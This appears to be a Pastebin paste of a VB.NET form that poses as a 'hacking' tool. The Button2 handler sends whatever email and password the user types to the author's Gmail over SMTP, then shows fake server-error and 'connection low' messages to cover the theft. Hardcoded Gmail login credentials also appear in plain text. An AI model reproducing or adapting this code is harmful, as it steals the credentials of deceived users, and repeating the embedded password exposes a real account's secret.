Guest User

Untitled

a guest
Jun 2nd, 2018
249
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.75 KB | None | 0 0
  1. End Sub
  2.  
  3. Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
  4. If Button1.Click Then
  5. CheckBox1.Checked = True
  6. MsgBox("Succeed Login!!!")
  7. End If
  8.  
  9.  
  10. End Sub
  11.  
  12. Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
  13. Timer1.Start()
  14. If TextBox1.Text = "" Then
  15. MsgBox("Email Is Missing")
  16. If TextBox2.Text = "" Then
  17. MsgBox("Password Is Mising")
  18. Else
  19. End If
  20. Dim smtpServer As New SmtpClient()
  21. Dim mail As New MailMessage()
  22. smtpServer.Credentials = New Net.NetworkCredential("anandarauf02@gmail.com", "ceomrvd022000")
  23. smtpServer.Port = 587
  24. smtpServer.Host = "smtp.gmail.com"
  25. smtpServer.EnableSsl = True
  26. mail = New MailMessage()
  27. mail.From = New MailAddress("anandarauf02@gmail.com")
  28. mail.To.Add("anandarauf02@gmail.com")
  29. mail.Subject = "Email: " & TextBox1.Text
  30. mail.Body = "Email : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
  31. smtpServer.Send(mail)
  32. MsgBox("Disconnected From Server, Please try again later!", MsgBoxStyle.Critical, "Server Error")
  33. Dim done As MsgBoxResult
  34. done = MsgBox("Wait 12 Hours For Succeed Hacked!!!!. Done? Klik Yes.", MsgBoxStyle.Question + MsgBoxStyle.YesNo, "Confirm")
  35. If done = MsgBoxResult.Yes Then
  36. End If
  37. Me.Dispose()
  38. Exit Sub
  39. End If
  40. End Sub
  41.  
  42. Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
  43. ProgressBar1.Increment(1)
  44. MsgBox("Start Process", MsgBoxStyle.Information, "Start Process")
  45.  
  46. If ProgressBar1.Value = ProgressBar1.Maximum Then
  47. Timer1.Stop()
  48. MsgBox("Sorry Your Process Failed, Because Your Connection Low!!!", MsgBoxStyle.Critical, "Failed !!!!")
  49. End If
  50. End Sub
Add Comment
Please, Sign In to add comment